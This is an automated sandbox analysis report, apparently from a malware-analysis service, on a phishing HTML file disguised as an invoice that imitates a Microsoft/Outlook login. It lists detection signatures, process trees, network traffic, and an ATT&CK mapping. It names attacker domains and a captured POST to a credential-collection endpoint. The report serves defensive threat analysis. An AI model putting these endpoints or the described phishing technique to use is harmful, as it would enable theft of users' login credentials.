Edit tour

Windows Analysis Report
Invoice Confirmation Subscription_2EZHMA9.htm

Overview

General Information

Sample name:	Invoice Confirmation Subscription_2EZHMA9.htm
Analysis ID:	1654704
MD5:	7493da1f3f66726d6d2cf9ee1bb238c1
SHA1:	77c042eb7f7dc704b5136e23526aacef7ac3eb61
SHA256:	cd4354fa0e43b6ab3f8550b3c5703f72475bbd13a94ed1027cbd1c2860df745d
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish45

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

HTML file submission containing password form

HTML page contains obfuscated javascript

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains password input but no form action

HTML page contains hidden javascript code

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid 'sign-in options' or 'sign-up' link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 3816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2145697108434616853,9735231420047323637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2028 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Invoice Confirmation Subscription_2EZHMA9.htm" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.6.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
0.2.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
0.7.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_45	Yara detected HtmlPhish_45	Joe Security

HTTP traffic detected: POST /app/godag.php HTTP/1.1Host: erfectries.jamesolflt.bondConnection: keep-aliveContent-Length: 66sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_82.1.dr	String found in binary or memory: http://jquery.org/license
Source: chromecache_86.1.dr	String found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_82.1.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_82.1.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_82.1.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_82.1.dr	String found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_82.1.dr	String found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_85.1.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_82.1.dr	String found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_82.1.dr	String found in binary or memory: https://github.com/eslint/eslint/issues/6125
Source: chromecache_82.1.dr	String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_82.1.dr	String found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_82.1.dr	String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_85.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_85.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_82.1.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_82.1.dr	String found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_82.1.dr	String found in binary or memory: https://jquery.com/
Source: chromecache_82.1.dr	String found in binary or memory: https://jquery.org/license
Source: chromecache_82.1.dr	String found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_82.1.dr	String found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_82.1.dr	String found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_82.1.dr	String found in binary or memory: https://sizzlejs.com/
Source: chromecache_82.1.dr	String found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: chromecache_82.1.dr	String found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 142.251.40.228:443 -> 192.168.2.9:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.9:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.9:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.9:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.9:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.9:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.19:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.19:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.4.1:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.28.19:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.96.122.66:443 -> 192.168.2.9:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.9:49757 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Invoice Confirmation Subscription_2EZHMA9.htm

Initial sample: invoice

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir4920_884927020

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir4920_884927020

Jump to behavior

Source: classification engine

Classification label: mal84.phis.winHTM@25/32@24/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2145697108434616853,9735231420047323637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2028 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Invoice Confirmation Subscription_2EZHMA9.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2145697108434616853,9735231420047323637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2028 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm

HTTP Parser: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice Confirmation Subscription_2EZHMA9.htm	0%	Virustotal		Browse
Invoice Confirmation Subscription_2EZHMA9.htm	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://erfectries.jamesolflt.bond/app/godag.php	100%	Avira URL Cloud	malware
file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
s-part-0010.t-0009.t-msedge.net	13.107.246.38	true	false	high
ooc-g2.tm-4.office.com	40.97.4.1	true	false	high
e329293.dscd.akamaiedge.net	23.209.72.9	true	false	high
code.jquery.com	151.101.2.137	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
7b6fzcwcqmmd8xoz5.kaisargift.com	104.21.6.28	true	false	unknown
maxcdn.bootstrapcdn.com	104.18.11.207	true	false	high
www.google.com	142.251.40.228	true	false	high
MNZ-efz.ms-acdc.office.com	52.96.122.66	true	false	high
erfectries.jamesolflt.bond	172.67.190.19	true	false	high
www.tm.a.prd.aadg.trafficmanager.net	40.126.28.19	true	false	high
_8443._https.7b6fzcwcqmmd8xoz5.kaisargift.com	unknown	unknown	false	unknown
outlook.office.com	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	high
login.microsoftonline.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://code.jquery.com/jquery-3.2.1.slim.min.js	false		high
https://erfectries.jamesolflt.bond/app/godag.php	false	Avira URL Cloud: malware	unknown
http://c.pki.goog/r/r4.crl	false		high
https://outlook.office.com/	false		high
https://outlook.office.com/owa/	false		high
http://c.pki.goog/r/gsr1.crl	false		high
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=2a267cf4-4cb2-f4e9-3d58-f637b388b3ac&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638791957673077035.862b5393-7627-4501-98ae-9eb12c83ced3&state=Dcs7FoAgDADBoM_jRAIxv-OAUlt6fVPMdlsAYE9bKpQBU3aLFmJqTGbEcrr2KRyMpt3wEmoYPhbGmq3fzvd6uOR71Pcb9Qc	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=1c064fc4-9d27-bbd6-a42f-bf7d86728cbc&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638791957760073846.5db5c367-ca06-4bf8-8ba0-6d9e4cbdea1e&state=DctBEoAgCEBRrOk4JI4KeBxQ27bs-rF4f_cTAJzhCIkiIFxVRhldhImkauO7L--zsuA0Ymz-KKobIa-x2_S1rewU75Xfz_IP	false		high
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg	false		high
https://code.jquery.com/jquery-3.3.1.js	false		high
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=fed3d36f-8ae3-3d09-5d7f-9db3a93563a1&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638791957494166796.0183df0d-d0c0-4d9a-8337-34682ca3f5bb&state=Dcs7EoAgDABR0PE4kWBCPscBMrSWXl-Kt93mlNK5HVvGnaRCpl69KTtXEXW5sRrFwoDAicDhHYxIgVjsmZ1WGyPv9yrv18sP	false		high
file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	true	Avira URL Cloud: safe	unknown
https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_kfhrfyfy-sm2tmkm5ficcw2.css	false		high
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	false		high
https://outlook.office.com/mail/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://bugs.webkit.org/show_bug.cgi?id=136851	chromecache_82.1.dr	false	high
http://jquery.org/license	chromecache_82.1.dr	false	high
https://jsperf.com/thor-indexof-vs-for/5	chromecache_82.1.dr	false	high
https://bugs.jquery.com/ticket/12359	chromecache_82.1.dr	false	high
https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/#strip-and-collapse-whitespace	chromecache_82.1.dr	false	high
https://promisesaplus.com/#point-75	chromecache_82.1.dr	false	high
https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a	chromecache_82.1.dr	false	high
https://drafts.csswg.org/cssom/#common-serializing-idioms	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled	chromecache_82.1.dr	false	high
https://bugs.webkit.org/show_bug.cgi?id=29084	chromecache_82.1.dr	false	high
https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace	chromecache_82.1.dr	false	high
https://github.com/eslint/eslint/issues/6125	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled	chromecache_82.1.dr	false	high
https://github.com/jquery/jquery/pull/557)	chromecache_82.1.dr	false	high
https://github.com/twbs/bootstrap/graphs/contributors)	chromecache_85.1.dr	false	high
https://bugs.chromium.org/p/chromium/issues/detail?id=378607	chromecache_82.1.dr	false	high
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	chromecache_82.1.dr	false	high
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	chromecache_82.1.dr	false	high
https://bugs.chromium.org/p/chromium/issues/detail?id=470258	chromecache_82.1.dr	false	high
http://opensource.org/licenses/MIT).	chromecache_86.1.dr	false	high
https://bugs.jquery.com/ticket/13378	chromecache_82.1.dr	false	high
https://promisesaplus.com/#point-64	chromecache_82.1.dr	false	high
https://promisesaplus.com/#point-61	chromecache_82.1.dr	false	high
https://drafts.csswg.org/cssom/#resolved-values	chromecache_82.1.dr	false	high
https://bugs.chromium.org/p/chromium/issues/detail?id=589347	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/multipage/syntax.html#attributes-2	chromecache_82.1.dr	false	high
https://promisesaplus.com/#point-59	chromecache_82.1.dr	false	high
https://jsperf.com/getall-vs-sizzle/2	chromecache_82.1.dr	false	high
https://promisesaplus.com/#point-57	chromecache_82.1.dr	false	high
https://github.com/eslint/eslint/issues/3229	chromecache_82.1.dr	false	high
https://promisesaplus.com/#point-54	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/multipage/forms.html#category-listed	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled	chromecache_82.1.dr	false	high
https://developer.mozilla.org/en-US/docs/CSS/display	chromecache_82.1.dr	false	high
https://jquery.org/license	chromecache_82.1.dr	false	high
https://jquery.com/	chromecache_82.1.dr	false	high
https://getbootstrap.com)	chromecache_85.1.dr	false	high
https://bugs.webkit.org/show_bug.cgi?id=137337	chromecache_82.1.dr	false	high
https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled	chromecache_82.1.dr	false	high
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_85.1.dr	false	high
https://promisesaplus.com/#point-48	chromecache_82.1.dr	false	high
https://github.com/jquery/sizzle/pull/225	chromecache_82.1.dr	false	high
https://sizzlejs.com/	chromecache_82.1.dr	false	high
https://bugs.chromium.org/p/chromium/issues/detail?id=449857	chromecache_82.1.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
23.209.72.9	e329293.dscd.akamaiedge.net	United States	20940	AKAMAI-ASN1EU	false
40.126.28.19	www.tm.a.prd.aadg.trafficmanager.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.4.1	ooc-g2.tm-4.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
